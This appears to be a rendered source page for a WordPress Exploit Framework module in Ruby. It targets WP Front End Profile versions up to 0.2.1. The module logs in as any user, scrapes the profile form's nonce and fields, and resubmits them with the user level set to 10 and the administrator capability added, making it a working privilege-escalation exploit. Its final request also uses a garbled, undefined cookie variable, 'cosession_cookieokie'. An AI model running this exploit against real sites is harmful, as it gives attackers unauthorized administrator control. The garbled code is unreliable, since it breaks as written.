class Wpxf::Auxiliary::WpFrontEndProfilePrivilegeEscalation
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 6
# Builds the module: runs the Wpxf::Module initializer, registers the module
# metadata via update_info, and declares the single option this module needs
# (the path of the page that hosts the plugin's profile editor form).
def initialize
  super

  metadata = {
    name: 'WP Front End Profile <= 0.2.1 Privilege Escalation',
    desc: %( The WP Front End Profile plugin, in versions <= 0.2.1, allows authenticated users of any user level to escalate their user role to an administrator. ),
    # WPXF module author
    author: ['rastating'],
    references: [
      ['WPVDB', '8620']
    ],
    date: 'Sep 15 2016'
  }
  update_info(**metadata)

  # The form page location is site-specific, so the operator must supply it.
  form_path_option = StringOption.new(
    name: 'profile_form_path',
    desc: 'The path to the page containing the profile editor form',
    required: true
  )
  register_options([form_path_option])
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 33
# Reports whether the target looks affected by comparing the plugin version
# advertised in its readme against 0.2.2 (presumably the first fixed release,
# given the module targets <= 0.2.1 — confirm against the advisory).
# Returns whatever check_plugin_version_from_readme returns.
def check
  plugin_slug = 'wp-front-end'
  fixed_version = '0.2.2'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 45
# Fetches the profile editor page with the current session cookie.
# 'follow_http_redirection' is forced on for this single request only
# (scoped_option_change presumably restores the previous value afterwards).
# Returns the response object produced by execute_get_request, or nil if the
# block never ran.
def fetch_profile_form
  response = nil
  request = { url: profile_form_url, cookie: session_cookie }

  scoped_option_change('follow_http_redirection', true) do
    response = execute_get_request(**request)
  end

  response
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 55
# Retrieves the profile form and collects the current values of the inputs
# that need to be resubmitted: the plugin nonce field, WordPress' referer
# field and every profile[...] input.
#
# Returns a Hash of field name => current value, or nil when the form page
# could not be fetched with an HTTP 200 response.
#
# NOTE: the form is scraped with a regular expression rather than an HTML
# parser, so an <input> whose attributes appear in another order (value
# before name) or that lacks a value attribute is silently skipped.
def form_fields_with_default_values
  response = fetch_profile_form
  return nil if !response || response.code != 200

  input_pattern = /<input.+?name="(.+?)".+?value="(.*?)".*?>/i
  wanted_prefixes = ['wpfep_nonce_name', '_wp_http_referer', 'profile[']

  response.body.scan(input_pattern).each_with_object({}) do |(field_name, default_value), fields|
    next unless field_name.start_with?(*wanted_prefixes)

    emit_info "Found field #{field_name}", true
    fields[field_name] = default_value
  end
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 41
# Absolute URL of the page hosting the profile editor form: the target's
# base URI joined with the operator-supplied 'profile_form_path' option.
def profile_form_url
  form_path = datastore['profile_form_path']
  normalize_uri(full_uri, form_path)
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 37
# Always true: the module acts as a logged-in user (the described flaw is
# reachable by any authenticated role), so the framework has to establish a
# session before run is invoked.
def requires_authentication
  true
end
# File lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb, line 70
# Entry point. After the superclass run (which, since requires_authentication
# is true, presumably establishes the user session), it fetches the profile
# form's current field values and resubmits them with the role-bearing
# fields overwritten. Returns false if super returns false or the form could
# not be retrieved; otherwise returns the result of execute_post_request.
#
# Root cause, as far as this page shows: the plugin appears to accept the
# profile[...] role/level fields straight from the client on form submission.
# The remediation is updating the plugin beyond 0.2.1 (see check).
def run
  return false unless super

  emit_info 'Requesting profile editor form...'
  form_fields = form_fields_with_default_values

  if form_fields.nil?
    emit_error 'Failed to retrieve the profile form'
    return false
  end

  # Overwrite the role-bearing fields captured from the form; the remaining
  # captured fields (nonce, referer) are resubmitted unchanged.
  form_fields['profile[wp_user_level]'] = 10
  form_fields['profile[wp_capabilities][administrator]'] = 1
  form_fields['profile[wpfep_save]'] = 'Update Profile'

  emit_info 'Elevating privileges...'
  execute_post_request(
    url: profile_form_url,
    # NOTE(review): `cosession_cookieokie` is not defined anywhere on this
    # page; the GET in fetch_profile_form uses `session_cookie`, so this looks
    # like a rendering artifact — confirm against the source file.
    cookie: cosession_cookieokie,
    body: form_fields
  )
end